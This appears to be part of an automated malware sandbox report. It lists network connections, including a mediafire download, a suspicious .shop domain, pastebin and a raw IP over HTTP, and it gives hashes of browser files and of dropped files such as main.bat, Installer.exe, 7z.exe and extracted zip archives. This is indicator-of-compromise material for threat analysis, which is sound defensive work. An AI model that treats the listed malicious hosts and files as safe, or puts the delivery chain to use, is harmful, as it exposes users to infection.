US 8.8.8.8:53 151.84.255.185.in-addr.arpa udp
US 8.8.8.8:53 google-bidout-d.openx.net udp
US 8.8.8.8:53 ghb1.adtelligent.com udp
GB 142.250.180.4:443 www.google.com udp
US 35.244.159.8:443 google-bidout-d.openx.net tcp
GB 185.239.172.170:443 ghb1.adtelligent.com tcp
US 8.8.8.8:53 ag.gbc.criteo.com udp
US 8.8.8.8:53 gem.gbc.criteo.com udp
FR 185.235.86.211:443 ag.gbc.criteo.com tcp
NL 185.235.87.196:443 gem.gbc.criteo.com tcp
US 8.8.8.8:53 8.159.244.35.in-addr.arpa udp
US 8.8.8.8:53 170.172.239.185.in-addr.arpa udp
US 8.8.8.8:53 cdn.ampproject.org udp
GB 216.58.201.97:443 cdn.ampproject.org tcp
GB 216.58.201.97:443 cdn.ampproject.org tcp
GB 216.58.201.97:443 cdn.ampproject.org tcp
GB 216.58.201.97:443 cdn.ampproject.org tcp
GB 216.58.201.97:443 cdn.ampproject.org tcp
US 8.8.8.8:53 2.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.87.235.185.in-addr.arpa udp
US 8.8.8.8:53 211.86.235.185.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 download2265.mediafire.com udp
US 199.91.155.6:443 download2265.mediafire.com tcp
US 199.91.155.6:443 download2265.mediafire.com tcp
GB 142.250.178.1:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 sys.ctrackapp.com udp
GB 108.138.233.10:443 sys.ctrackapp.com tcp
GB 108.138.233.10:443 sys.ctrackapp.com tcp
US 8.8.8.8:53 6.155.91.199.in-addr.arpa udp
US 8.8.8.8:53 track.donecperficiam.com udp
GB 18.165.227.107:443 track.donecperficiam.com tcp
GB 18.165.227.107:443 track.donecperficiam.com tcp
US 8.8.8.8:53 go.etoro.com udp
NL 104.109.249.151:443 go.etoro.com tcp
NL 104.109.249.151:443 go.etoro.com tcp
US 8.8.8.8:53 marketing.etorostatic.com udp
NL 92.122.63.182:443 marketing.etorostatic.com tcp
US 8.8.8.8:53 10.233.138.108.in-addr.arpa udp
US 8.8.8.8:53 107.227.165.18.in-addr.arpa udp
US 8.8.8.8:53 151.249.109.104.in-addr.arpa udp
US 8.8.8.8:53 etoro-cdn.etorostatic.com udp
NL 92.122.63.182:443 etoro-cdn.etorostatic.com tcp
GB 216.58.201.106:443 translate-pa.googleapis.com udp
US 8.8.8.8:53 182.63.122.92.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 cdn.cookielaw.org udp
US 104.19.177.52:443 cdn.cookielaw.org tcp
US 8.8.8.8:53 52.177.19.104.in-addr.arpa udp
US 104.19.177.52:443 cdn.cookielaw.org tcp
US 8.8.8.8:53 bat.bing.com udp
US 8.8.8.8:53 static.hotjar.com udp
US 8.8.8.8:53 static.ads-twitter.com udp
US 8.8.8.8:53 c0.adalyser.com udp
US 8.8.8.8:53 amplify.outbrain.com udp
US 8.8.8.8:53 cdn.taboola.com udp
GB 13.224.245.27:443 static.hotjar.com tcp
US 151.101.193.44:443 cdn.taboola.com tcp
GB 23.74.161.65:443 amplify.outbrain.com tcp
US 204.79.197.237:443 bat.bing.com tcp
GB 151.101.188.157:443 static.ads-twitter.com tcp
IE 54.76.9.107:443 c0.adalyser.com tcp
BE 74.125.71.155:443 stats.g.doubleclick.net udp
GB 172.217.16.227:443 www.google.co.uk udp
US 8.8.8.8:53 9944765.fls.doubleclick.net udp
US 8.8.8.8:53 geolocation.onetrust.com udp
GB 172.217.16.230:443 9944765.fls.doubleclick.net tcp
US 104.18.32.137:443 geolocation.onetrust.com tcp
US 8.8.8.8:53 27.245.224.13.in-addr.arpa udp
US 8.8.8.8:53 44.193.101.151.in-addr.arpa udp
US 8.8.8.8:53 65.161.74.23.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 157.188.101.151.in-addr.arpa udp
US 8.8.8.8:53 107.9.76.54.in-addr.arpa udp
GB 172.217.16.230:443 9944765.fls.doubleclick.net udp
US 8.8.8.8:53 trc.taboola.com udp
US 8.8.8.8:53 tr.outbrain.com udp
US 8.8.8.8:53 wave.outbrain.com udp
US 8.8.8.8:53 t.co udp
GB 23.74.161.65:443 wave.outbrain.com tcp
GB 23.74.161.65:443 wave.outbrain.com tcp
GB 23.74.161.65:443 wave.outbrain.com tcp
GB 23.74.161.65:443 wave.outbrain.com tcp
GB 23.74.161.65:443 wave.outbrain.com tcp
GB 23.74.161.65:443 wave.outbrain.com tcp
US 50.31.142.223:443 tr.outbrain.com tcp
US 50.31.142.223:443 tr.outbrain.com tcp
US 8.8.8.8:53 analytics.twitter.com udp
PL 93.184.221.165:443 t.co tcp
US 104.244.42.67:443 analytics.twitter.com tcp
US 8.8.8.8:53 dc.services.visualstudio.com udp
US 8.8.8.8:53 script.hotjar.com udp
NL 20.50.88.242:443 dc.services.visualstudio.com tcp
US 8.8.8.8:53 cdn.mxpnl.com udp
FR 18.164.52.73:443 script.hotjar.com tcp
US 130.211.5.208:443 cdn.mxpnl.com tcp
US 8.8.8.8:53 223.142.31.50.in-addr.arpa udp
US 8.8.8.8:53 230.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 165.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 137.32.18.104.in-addr.arpa udp
US 8.8.8.8:53 226.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 67.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 242.88.50.20.in-addr.arpa udp
US 8.8.8.8:53 73.52.164.18.in-addr.arpa udp
US 8.8.8.8:53 208.5.211.130.in-addr.arpa udp
US 8.8.8.8:53 etorologsapi.etoro.com udp
IE 20.54.24.199:443 etorologsapi.etoro.com tcp
US 8.8.8.8:53 199.24.54.20.in-addr.arpa udp
US 8.8.8.8:53 csi.gstatic.com udp
SG 74.125.200.94:443 csi.gstatic.com tcp
SG 74.125.200.94:443 csi.gstatic.com tcp
SG 74.125.200.94:443 csi.gstatic.com tcp
US 8.8.8.8:53 94.200.125.74.in-addr.arpa udp
DE 3.122.80.51:443 btlr.sharethrough.com tcp
FR 185.255.84.151:443 hb-api.omnitagjs.com tcp
US 8.8.8.8:53 ghb2.adtelligent.com udp
US 23.227.151.242:443 ghb2.adtelligent.com tcp
US 23.227.151.194:443 ghb2.adtelligent.com tcp
US 8.8.8.8:53 242.151.227.23.in-addr.arpa udp
GB 142.250.178.1:443 tpc.googlesyndication.com udp
GB 185.239.172.170:443 ghb2.adtelligent.com tcp
GB 185.239.172.170:443 ghb2.adtelligent.com tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 a.nel.cloudflare.com udp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 8.8.8.8:53 1.80.190.35.in-addr.arpa udp
US 8.8.8.8:53 btlr.sharethrough.com udp
US 23.227.151.242:443 ghb2.adtelligent.com tcp
US 8.8.8.8:53 hb-api.omnitagjs.com udp
DE 3.123.222.124:443 btlr.sharethrough.com tcp
FR 185.255.84.150:443 hb-api.omnitagjs.com tcp
US 8.8.8.8:53 ghb.adtelligent.com udp
GB 185.83.69.58:443 ghb.adtelligent.com tcp
GB 172.217.169.34:443 securepubads.g.doubleclick.net udp
GB 185.239.172.170:443 ghb.adtelligent.com tcp
US 8.8.8.8:53 124.222.123.3.in-addr.arpa udp
US 8.8.8.8:53 150.84.255.185.in-addr.arpa udp
US 8.8.8.8:53 58.69.83.185.in-addr.arpa udp
GB 142.250.178.1:443 tpc.googlesyndication.com udp
GB 142.250.180.4:443 www.google.com udp
GB 216.58.204.66:443 googleads.g.doubleclick.net udp
US 216.239.34.36:443 region1.analytics.google.com udp
US 8.8.8.8:53 bargainnykwo.shop udp
US 104.21.47.93:443 bargainnykwo.shop tcp
US 104.21.47.93:443 bargainnykwo.shop tcp
US 8.8.8.8:53 93.47.21.104.in-addr.arpa udp
US 104.21.47.93:443 bargainnykwo.shop tcp
US 104.21.47.93:443 bargainnykwo.shop tcp
US 104.21.47.93:443 bargainnykwo.shop tcp
US 104.21.47.93:443 bargainnykwo.shop tcp
US 104.21.47.93:443 bargainnykwo.shop tcp
US 104.21.47.93:443 bargainnykwo.shop tcp
DE 147.45.47.81:80 147.45.47.81 tcp
US 8.8.8.8:53 81.47.45.147.in-addr.arpa udp
US 104.20.4.235:443 pastebin.com tcp
DE 147.45.47.81:80 147.45.47.81 tcp
DE 147.45.47.81:80 147.45.47.81 tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 06b496d28461d5c01fc81bc2be6a9978
SHA1 36e7a9d9c7a924d5bb448d68038c7fe5e6cbf5aa
SHA256 e4a2d1395627095b0fa55e977e527ccb5b71dff3cd2d138df498f50f9f5ab507
SHA512 6488a807c978d38d65010583c1e5582548ab8102ebd68ee827e603c9bdfcdbb9f98a488d31414a829409f6edca8bd2eb4aadd4ff31b144de41249fa63a26bc91

\??\pipe\LOCAL\crashpad_4332_TAJXSOPBZBPQBWXV

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 de1d175f3af722d1feb1c205f4e92d1e
SHA1 019cf8527a9b94bd0b35418bf7be8348be5a1c39
SHA256 1b99cae942ebf99c31795fa279d51b1a2379ca0af7b27bd3c58ea6c78a033924
SHA512 f0dcd08afd3c6a761cc1afa2846ec23fb5438d6127ebd535a754498debabd0b1ebd04858d1b98be92faf14b512f982b1f3dcbb702860e96877eb835f763f9734

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 73e8cf7499c9ee0e50844e5483fe5a7a
SHA1 445dbb43dd1aca6b3bec8e5d321ea75a64d6f9af
SHA256 349c9516135c9c304e1367b888496ff317cabc3a57abf0a0d0533c99e65d8024
SHA512 6d3f13e298526829543dc616fd502a484bad681d9c16fca9ba768c63097902a5bb728aa9fb8bc754a4b2337419842d7a7cb47989c8763e0c5b19af20326312d1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 bcbd2fd9779e3b843fca25bf3e598d09
SHA1 68961415c2cb6a941f2a95f2f2a56b1abd67f145
SHA256 82b521392c6c004146f161724b3795db81e69387b3f55cb0ab01f64b9eeaa9ad
SHA512 64124fe5e672a392cc512a22e8491e23bbc72783a02f231618db2508f4a4e4b16fc5f833286785315d7eaad741d4801ecb0718e9b85346925ab2c7f95e29b4c2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 134a307a8f54cf12c22f3b1eac7d0808
SHA1 9ab7d90a0648f266b9332638444bcb1c2175cebc
SHA256 3cde134b333ec57982788650ed9fae9cd353c73f94f54ad2e71761362c6de701
SHA512 f32bba608a087dfe05e882c524ae6cb0dfd122c8939e7f10bc252563e51d641cda1e466b9a2c6cf3f78888a931956785ce96da38fb05fd57d03c979a513b18ad

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 38a26229ba39eb70b629641a012a0895
SHA1 22213bb00677b758a09304efc7a44f7d126833e7
SHA256 6c15e11ab2bd61dbeb9c8c32f92d590ede634f8e4dc28706b2ed1c60c5f8cd7f
SHA512 78c25a22291eda92380f3c9ff91f959742dad516359b76021f487ad8d4bba8fed6c20a15b2ceef49684a971096945df2004a73cfb370b5b9ae9ddf936a34c050

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 4235212a7dfd2a51f2724a0b5a11a30f
SHA1 e9f443deb144a2084f9d9079480efcb9354f7d53
SHA256 680b8e11e7b1b1c38c49007df8f55de7d24d02fd0861be389a4b85987adad10e
SHA512 1a9dfdee5e2d90681a2041b0a68a2cb2099852284123bb527c86d9e253ce401d75501fd889f59d620202f171cdcdedb76d9fa895788a4da5027c46258a977a3f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

MD5 0fc09c9c3219c609ba2b9fed7b09d4d4
SHA1 3302c8a63d411dbabcbab3f8d54ec0248141ba59
SHA256 a4f185a100c629a05622da5e95395924d3ae3a7a1739cf0dd2f843a80857dc31
SHA512 67c17487a171b14bfcaff090e5c666f3ac9d241427f0b5b77ff6e1121875b1d3a9e58959a13ced94fcb981d380a9870655a4f716b09df6f8d9f58f16180c1e1c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

MD5 d93800d8a77b5a8a23ec889fc76db694
SHA1 ec09b90d154d7fb428871034dfcfb695c4fe6a3f
SHA256 5afcee2da73d3c984b47833958f65caf290b12041a2b5c69a124ab4543b7f69a
SHA512 96a827ece6950bd57b5807920ed953ca60ac317816788d4582eb45d2ac2ee2d7cc9745dcf8f15017ebb2b86a23c17db12146685e80e23879230415d881bab9c4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

MD5 660c3b546f2a131de50b69b91f26c636
SHA1 70f80e7f10e1dd9180efe191ce92d28296ec9035
SHA256 fd91362b7111a0dcc85ef6bd9bc776881c7428f8631d5a32725711dce678bff9
SHA512 6be1e881fbb4a112440883aecb232c1afc28d0f247276ef3285b17b925ea0a5d3bac8eac6db906fc6ac64a4192dd740f5743ba62ba36d8204ff3e8669b123db2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

MD5 87e8230a9ca3f0c5ccfa56f70276e2f2
SHA1 eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7
SHA256 e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9
SHA512 37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

MD5 b743360743dc63200207d103eb1b95c6
SHA1 e72f603116b14184d57f9c9e0444b6c28ed53106
SHA256 5a3421491f6de9e5d09de73458046ba886af7d223f0271d44d879f1648975a8b
SHA512 6d3d2235f13cf358fd2d3a19dc8ad7229e4e468611c804375a2b89405ff3b46ce70f3a11b18492b3b6e03745f9aa33d59514eeaa9cf5f3cc4926bb86c74f373c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 fff46bcee6f699307ad87842d7a29f73
SHA1 25a40cd26353c32b075c4f15f63362ca4075525a
SHA256 b41e807640cc169ec6254c79863a45dfd82b4617ea457618f3fba38045d0c69e
SHA512 9eba032f7ed66a15f778ff39608bfbd2a41868b52619e317a5323100e10bc2ff49f30723ffd15e87bc4382e3ecc87b91d2672f5ab888386f8683bad24883a555

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000023

MD5 39b7e0d992290c41da06068bfbfc7c77
SHA1 f6a4d0d93047d6cadf48b2bb752f89bc9bbf6806
SHA256 92d3d1073c33cb7ee8711bde6ac3c519b2b5f0044e5a2582aba96b14ccfef01d
SHA512 c67131ea3093c9863d3c7dffc37cf54d4b17bee7abae3fda9195535bb8a736ab19115fdd14591c7fd1966014891f9b140b8763695a80207756bf01c534388a1b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 5f19b1660e029b6f42580e9540492ec1
SHA1 b99e69b0c7347d3670347153abc0199d74e213ad
SHA256 2195464a126334125d2782912f74c5e5a3056f38b5a1e2210c5b8813e5b001fa
SHA512 6a61289440652ede7620256a9a9f241ce9054f4e611fff4b7caa7653fdd6e1f302d7457ce87d513b32003fb78a959dfef4f976c7e02fcf62ec9f3dcd71466740

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe586f20.TMP

MD5 95a68111427ed98fcea713360fa43d83
SHA1 b4483f0f77b295adff94cd624eda0b7820434394
SHA256 7fa05c9c97b071b2c6c54d6375d369fd8121340c1063eabb8b3a30e0978f84d1
SHA512 8f10b50a5106bd9ecce2aeb409c3d1cf48e31b935c5c3bb76657dedf163b67b116aaaf99ccda458506d7b26d054b1aabedc450f731406994d4fd341c45900a7d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000034

MD5 151fb811968eaf8efb840908b89dc9d4
SHA1 7ec811009fd9b0e6d92d12d78b002275f2f1bee1
SHA256 043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed
SHA512 83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 62e5c130b1944366607e7decb41845e2
SHA1 b087aaad8a9d74cbd6fa15189d75a832d2e4c423
SHA256 c681f082e5db0bbb40dfcfa59a86a1ef70c9f98b5fa72445611a72f9025b8b45
SHA512 639e7d2bd7ee4529678d7ac76f6bed0a60a6378d1622597b4e4b4a79688fc2296807fea3e98f8357545092edd24acd479ca8e085c54a2109e71f928eba11e336

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 f43f541132b67c45e6edc5891c5d4885
SHA1 867e1955fe1106bb4b5027f40e60c8a86bd90317
SHA256 958c6c4f00d832ecd22b4b8aafdc01207b86c35e655b4d9538268ed1934b88c6
SHA512 068eaf83dfae5eb4a4a22155b542a7274d1848d44daa0c4ce31c8591bdd591607102de0a50ced2c1ea1c293ee3d1d2da111b7611f7f534a81bb00685b484c598

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 841ffb6ef42d5b4a27eb3ff69bf755ca
SHA1 6526f0fc1c6bfc284a09b15197b89dfedee951f0
SHA256 df516249b46ea672cb587f193892108e193e812ad86c31363df4a4890e480882
SHA512 f6da410800bc96508a5aa53e3af7aa3949143ff0843c187e1296f6dafa9e0e32d8d937181d3d0955885305d9f0c5fb66f8df69ba43e6e041c34a4000315d94fb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000026

MD5 6b04ab52540bdc8a646d6e42255a6c4b
SHA1 4cdfc59b5b62dafa3b20d23a165716b5218aa646
SHA256 33353d2328ea91f6abf5fb5c5f3899853dcc724a993b9086cab92d880da99f4d
SHA512 4f3b417c77c65936486388b618a7c047c84fb2e2dd8a470f7fe4ffec1ad6699d02fa9c1bbd551414eef0f2e6747a9ee59ca87198b20f9f4a9a01394ae69fa730

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000025

MD5 c03ff64e7985603de96e7f84ec7dd438
SHA1 dfc067c6cb07b81281561fdfe995aca09c18d0e9
SHA256 0db8e9f0a185bd5dd2ec4259db0a0e89363afa953069f5238a0537671de6f526
SHA512 bb0fd94c5a8944a99f792f336bb8a840f23f6f0f1cb9661b156511a9984f0bb6c96baf05b7c1cf0efb83f43a224ecea52740432e3cfc85e0799428765eefb692

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 2d952c85a1984e048c3e3985fb76d91f
SHA1 212aa3776ddfe5b1148b041756d9921b48d83cf0
SHA256 519795fd673fca8fe2e8fb8f0edc3294a3ebcc1a29d012420d040c102cb67190
SHA512 349a0a3f31210019f572b26e13b29f105380d63d1838ea831fde3972001ecbd25431e97e7c1187cb6332f4f3a45bc4bf8e6ec038ad3cd8994f78ab3acdf8b73f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index

MD5 a49bdd6f3fa17df3e15c6a610c551a2b
SHA1 0281c747de4b1c911b09cbf41f2846e6100fa5a2
SHA256 84ddba9584e1ae5091af5e32350f3bac88c0a5a404edd7c8cb89ffe8e85f1849
SHA512 6a63e24bb0d62b1a13e3b65cc639d97c7c4f490a62e5328a17685f3b634ebc8dd27f47de51318656cefc103b6a09ef91e9152c3179435efbec75085ee130ab14

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 3c31d485121d02c93d69a660c9ae84a9
SHA1 0195e08709d511651d58da568505fd846201ad46
SHA256 a9fde31918aa4759ccc17721f581683b5b8ad166d6187c8432b7cca9b48369f3
SHA512 ec24ed8d0207eb8b25aa77a0785a07a710c5caa8ca64206677d076a1aa955144ad465e3ab3a44523b6fec8ba1ec1e32ad77750b548489e6ca6dca580ac50cb8c

memory/5028-650-0x0000000000400000-0x0000000000458000-memory.dmp

memory/5028-651-0x0000000000400000-0x0000000000458000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

MD5 838a7b32aefb618130392bc7d006aa2e
SHA1 5159e0f18c9e68f0e75e2239875aa994847b8290
SHA256 ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA512 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

MD5 7ba655be0f090527afaac6e752f09d72
SHA1 95b83420f5f95c804d683a723c05b3ed07e08001
SHA256 e0d21d546ab6c03811d9e65666a3740924b64fef13536f42f9eb06c25db599b3
SHA512 5d0c983f11d801406b65d04fe373dae0597e11b5b56583335cb671602906821f7e5f95abc30b877f86a34484d6aad949f6bdfd9ee2d65f9066bc63db48b66e82

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 9aaa1e4144563f71ecc962c0f1b1ae71
SHA1 bac887f28389e5106a88b7cbf88d30622c565241
SHA256 b95ee46666bdd6d18f49f10e527d715015552f8b2548b8b4323b7e6fb459e9b8
SHA512 0c5d0fcaa42a56a2085e5634ab7cd3b18ddd2842915926a092f106e11c10f18521354ace94c0465e15cbaa286e12ea1eb3ceca7b9b6d58e86db637709f191320

C:\Users\Admin\AppData\Local\Temp\K3T1CRW47T00VJQDGK2TZ7USUH7.exe

MD5 b2e6a3d0bf3320b759c464ae6fa5b735
SHA1 cc9f5de7742b9c11f7c0c0e3f9d39b0c16b38cc1
SHA256 771b76ba28496c56d1d9c0fe67fdf7688a2f1b12a9eb428050551338945337a3
SHA512 bf2f09aebf6d4b07ec06ce37617361e149b26d7fc2f5c0715a5e479747eb5b1f8fc615c90d1e4d8d751e05dd566819facfef8a00cfb7acb61ec588b0c23b022a

C:\Users\Admin\AppData\Local\Temp\main\main.bat

MD5 893874465a8d9f68f0684fd61e9f1d3c
SHA1 866a58255ebab05d4ee2f2ed8383a6555ac1df03
SHA256 e0855b82ec99b14bdfa38dacf90dadb2071e0d413c6559c752e0b2c6e8cd08c0
SHA512 1cc878a3236a5ce4f3a89fae580b4d16a7842fd03dfe0a2c7d1d5da5be822528ea3826f659a70de727c9307fb15997f56b7204582043dc7efcc6c818f7aa2bd7

C:\Users\Admin\AppData\Local\Temp\main\file.bin

MD5 716459a6ceac7d310d4227ea3e9ddb59
SHA1 fa27addf18c197bf5fc054bfb5ae57de1caf3382
SHA256 ba5270891d3eef832fe34f9d67fbbb30ceb3873552ea859139914a6a783b0aa1
SHA512 3857cc099edd99f1c20d4c4456ec4577478afcbdb6073852c6df10775a4e6de0316ab68c6dacb7212d27f49057312ba1aeb0c35e695d84832f3e9f8d61f7d8c1

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

MD5 a62944686498212b290eae637729a151
SHA1 2053660850d3f578f7b31e5ced16069d6f9c4ee0
SHA256 0bb07f0caab7e5539e7efeca5bee359d9f6b49237e0c908981d9168680fe2b3e
SHA512 ae6abd482552445cbf8c308948519227b0d1a82c1b3adb4800f8c9ac32c519c8d0aee8f3b4caada26d1976b63b032aad72d95e574adf205b947dada23a5b8ad3

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

MD5 870a5535c79edcf782551514f48d89ab
SHA1 333d814d65753cdc4c4e8fb587c09af6960110d1
SHA256 814a92267e0d8867932afd625f2f8e55b04b88b2cfc31e91b6e45e473f1b057d
SHA512 f8743ca2f1ef2433b41adc41adf6a5836c1901bda70d5d76301cb06b471796b360544efa591c49b3a7d09eee12cef7ba20e79571f50d891d4729598210772b06

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

MD5 6f7f4f7ed739e3ac5eee8d0876ff76d4
SHA1 9a65d52885624dc47f342b5a9875d7720540c755
SHA256 b61a321a8a1f4ca1d8c52a1ad0464ac5882073ac8da7c5585f04ce2330b78acc
SHA512 35cad901c3f77c58803372a2f230701469d99fb9d8b16d82b59416a62d215614ab044dcae123473cc5d9a4a09e23f2edaac53ef82bbd5b3556b9b187cff50021

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

MD5 4a5f569872c858ede1c0c67500cfdd6d
SHA1 cdcac69d89b45a7903198467c2d2d32126c31661
SHA256 88b2d9a82c911ad61f3570aa31b360ae1649b117f6495459698d724f0c9638dc
SHA512 d9c6776829def517a253e9c60d0316dbc03092f850383305089dc1110b1abd19668ae47dca8188e96c6f12b66a8e5b5a783901f2115cadd5c1accf019c3bdb40

C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

MD5 6dd7f70cddc4310e047032d70550f72c
SHA1 e93c0d3a03dbe51eba117ea8e10bd0e8b6b27562
SHA256 e92508881b6d69c45897a58b4c7dc58ee68e438979604d7f7b6f6ff71f15444d
SHA512 1e6398a9739f57a3cf754a6e73f92cf67fe117440a6afe698767c578f396a4b8dab93b5568d02fa23fbcd3565b9017254625d58b1ea7a375c8537f2bab90f42c

C:\Users\Admin\AppData\Local\Temp\main\Installer.exe

MD5 4265bf9f9535ebb4e1830e2a50589285
SHA1 ddc45fe277a3b39179dd9e39e17d71b50a184607
SHA256 c07698b4c960b60d8a3c661887d6cc1f7fe74e31a24d4c2ae95d52d1c92ce403
SHA512 3a7a0a8a6b82d5e1b6c06c12250eb9b347ed024811467d6da5123f6d07a79836a4e414758cb5c708d0c96cc4a020f8743b2c1e4fa5f5ed448fc087772ab592be

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

MD5 18f4fe969c4ba0517b403e28f7ad2b72
SHA1 9df09751ee1246db2ed6b6ed6fec87fb0891e077
SHA256 06d1004f28a87b42b1d7ac23ff2e4b43d736295abc2e84740504386f40a041f4
SHA512 9847b8e2b849b09a76e22ab0d76a1a7d29079676dbdf4277b712709af0ac6a6f0e3a473f144f0a8e247861111357027a758b95e4d096d24cec160192c5da32a4

memory/5576-731-0x00000000002F0000-0x00000000002FC000-memory.dmp

memory/5576-732-0x00000000052D0000-0x0000000005874000-memory.dmp

memory/5576-733-0x0000000004D20000-0x0000000004DB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

MD5 a915fd2a4e2750ee9003e628294bf284
SHA1 f9adc1e65fc3d2cf39b2c5a89030f3225e21616d
SHA256 5e2e339dbee22d6c05d652646071bc81ad96a6422eb311453ca3905e7dfea285
SHA512 044d5370ec915fb488cf77c1b181f5a4f89833028266f922766b782ff445f61ab85b92980d6939d0e252a368eb846def27bcdea7f029999d6854a90c793b3a5f

memory/5576-735-0x0000000004F30000-0x0000000004F96000-memory.dmp

memory/5576-734-0x0000000004CF0000-0x0000000004CFA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 15c68ff60720faa1697d2e2df402d304
SHA1 9314845fc65479ce73776d3525a08ed4f4e7187a
SHA256 028dec1e4aab5277c3bce6c52d102688ec3082e427f65517f567efce8a8037c5
SHA512 d23032e68e9a20bfae2891f76f3fb95b40d3ea80a2a30ecd480c376ce27a40f68cd436ad4a6f8662de67c6518448f5ffd75bc41b2c1135acb96d1fa3f9c2fcc8

